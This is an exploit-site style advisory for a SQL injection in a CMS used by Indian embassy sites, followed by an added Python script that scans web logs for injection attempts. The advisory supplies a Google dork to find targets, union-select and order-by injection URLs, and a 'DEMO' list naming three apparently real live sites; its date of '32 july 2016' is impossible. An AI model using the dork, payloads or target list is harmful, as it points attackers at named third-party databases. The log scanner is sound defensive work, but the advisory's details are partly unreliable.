INDIAN EMBASSY Jadon CMS SQL INJECTION Vulnerability

2016.07.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###########################
# INDIAN EMBASSY Jadon CMS SQL INJECTION Vulnerability
###########################

=========================================================
[+] Title :- INDIAN EMBASSY Jadon CMS - SQL INJECTION
[+] Date :- 32 - july - 2016
[+] Vendor Homepage :- http://jadontech.com/
[+] Version :- All Versions
[+] Tested on :- Linux - Windows - Mac
[+] Category :- webapps
[+] Google Dorks :- "Designed by Jadon Technologies" or inurl:/news_detail.php?in_id= site:.in
[+] Exploit Author :- Natasya A.K.A codestack
[+] Team name :- codegirl , girls-silent , anongirls
[+] Official Website :- www.codegirlmovie.com
[+] Available :- sql injection cheat sheet | sql injection Havij
[+] Greedz to :- Indonesian People | Keep-silent | Hmei7
[+] Contact :- admin@kpu.go.id
=========================================================
[+] Severity Level :- High
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- id, newsid=
[+] Affected Area(s) :- Entire admin, database, Server
[+] About :- Unauthenticated SQL Injection via Multiple PHP Files causing an SQL error
[+] SQL vulnerable File :- /home/DOMAIN/public_html/XXX.php
[+] POC :- http://127.0.0.1/news_detail.php?id=[SQL]'

The SQL injection web vulnerability can be exploited by remote attackers without a privileged web-application user account or user interaction.

http://www.[WEBSITE].com/news_detail.php?id=63' order by [SQL INJECTION]--+
http://www.[WEBSITE].com/news_detail.php?id=63' union all select [SQL INJECTION]--+

[+] DEMO :-
http://www.jecrcudml.edu.in/news_detail.php?id=17'
http://www.embindia.org/news_detail.php?id=21
http://eoilisbon.in/news_detail.php?id=6
=======================================================

###########################
# Discovered Analyze by : Ternate-Labs Pentesting
###########################
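
Added example (not part of the original advisory and not the vendor's code): a check a site operator could run over web server logs to find requests that put non-integer values into the parameters the advisory names (id, newsid, plus in_id from the dork line). The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory (id, newsid) plus in_id from its dork line.
WATCHED_PARAMS = {"id", "newsid", "in_id"}
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return [(param, decoded_value)] for watched params that are not plain integers."""
    parts = urlsplit(request_target)
    # The advisory says multiple PHP files are affected, so check every .php path.
    if not parts.path.lower().endswith(".php"):
        return []
    hits = []
    # parse_qsl percent-decodes values, so %27 and a raw quote look the same here.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in WATCHED_PARAMS and not re.fullmatch(r"\d{1,10}", value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Yield (line_number, client_ip, param, value) for each flagged request."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        ip = line.split(" ", 1)[0]
        for name, value in suspicious_params(m.group(1)):
            yield n, ip, name, value

# Constructed sample lines (documentation-range IPs), not taken from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Jul/2016:10:00:01 +0000] "GET /news_detail.php?id=17 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/Jul/2016:10:00:05 +0000] "GET /news_detail.php?id=63%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [31/Jul/2016:10:00:09 +0000] "GET /news_detail.php?newsid=21%27+order+by+1--+ HTTP/1.1" 200 298',
    '192.0.2.10 - - [31/Jul/2016:10:00:12 +0000] "GET /index.php?page=2 HTTP/1.1" 200 8841',
]

if __name__ == "__main__":
    for n, ip, name, value in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} sent non-integer {name}={value!r}")
```

POST bodies do not appear in a standard access log, so this covers only the GET side of the advisory's "GET / POST" note; the same integer check applied in the application before the query is built covers both.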

References:

https://cxsecurity.com/issue/WLB-2016050106
http://iedb.ir/exploits-4007.html

